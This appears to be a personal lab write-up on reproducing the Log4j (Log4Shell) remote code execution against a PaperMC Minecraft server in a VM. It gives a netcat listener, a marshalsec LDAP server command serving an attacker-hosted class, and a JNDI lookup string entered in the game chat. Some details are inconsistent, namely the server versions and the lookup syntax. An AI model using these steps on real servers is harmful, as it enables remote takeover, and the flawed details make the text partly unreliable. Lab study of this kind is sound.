# Log4j incident - Practical example The general idea behind this example is to host a PaperMC Minecraft Server in a Windows VM and show how RCE (Remote Code Execution) works via some JNDI HTTP and LDAP connections. This example and vulnerability is, of course, not found by myself and purely inspired [by a video of John Hammond](https://www.youtube.com/watch?v=7qoPDq41xhQ). ## Setup The whole vulnerability was found in Minecraft version 1.18, which is using jdk-8u181, and was already [patched in 1.18.1](https://www.minecraft.net/en-us/article/minecraft-java-edition-1-18-1). The goal in this practical example is to setup a [PaperMC](https://papermc.io) Minecraft Server on a Windows VM, and attack it via Kali by opening Netcat connections for JNDI with HTTP and LDAP. Based on this knowledge, we can make use of a simple Java program called ["Java Unmarshaller"](https://github.com/mbechler/marshalsec) which basically generates payloads for Java RCE. ### Minecraft Server To setup the Minecraft Server we first need to download the PaperMC version which still has the Log4j vulnerability unpatched. This will be [PaperMC-1.8.8-443](https://api.papermc.io/v2/projects/paper/versions/1.8.8/builds/443/downloads/paper-1.8.8-443.jar). (This version will be used based on the video mentioned above, since the steps to reproduce are clear.) After that, we create a folder and put the .jar-File into it. To make use of the .jar-File we need to create a simple Batch script to execute the Server JAR file with some Java arguments. ``` java -Xms2G -Xmx2G -jar paper-1.8.8-443.jar --nogui ``` This will create new files in the directory, the one which interrupts the server startup phase will be a file called "eula.txt". To start the server, we need to set the boolean in the file from ```false```to ```true```. After that we are clear to start the server and connect with our Minecraft Client to it. ## Setup Attacker VM On the Kali VM we can now setup a Netcat listener to connect via JNDI to. A basic example would be the following: ```nc -lvnp 9000``` After that we will make use of an RCE PoC found on [Github](https://github.com/xiajun325/apache-log4j-rce-poc), which basically injects code into Apache Webservers, which are also based on Java and use Log4j. ```java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<VM-IP>:8888/#Log4jRCE"``` An important thing to point out is the ```#Log4jRCE``` path in the URL, which will call the Log4jRCE static class of the PoC and also that we need to specify the IP and port on which our webserver will run, which then "redirects" the requests to the Log4jRCE class. This static class may be used to inject real code (e.g. Powershell code which can also be done by encoding it to Base64), but in our case we will stick to open a normal Windows app like "calc.exe" or "mspaint.exe". It will also open a listening port of 1389. All we now need to do is compile the aforementioned Log4jRCE.java file, which will result into a Log4jRCE.class file. So when we input something like ```$(jndi:ldap:<vm-ip>:1389/Log4jRCE)``` into the Minecraft Chat on our Client, it should execute a command we defined in Log4jRCE.java on the Server. ## Steps done - [x] Setup Windows VM - [x] Setup Kali VM - [x] Setup Minecraft Server - [ ] Setup Java Unmarshaller LDAP Server - [ ] Setup Log4j RCE PoC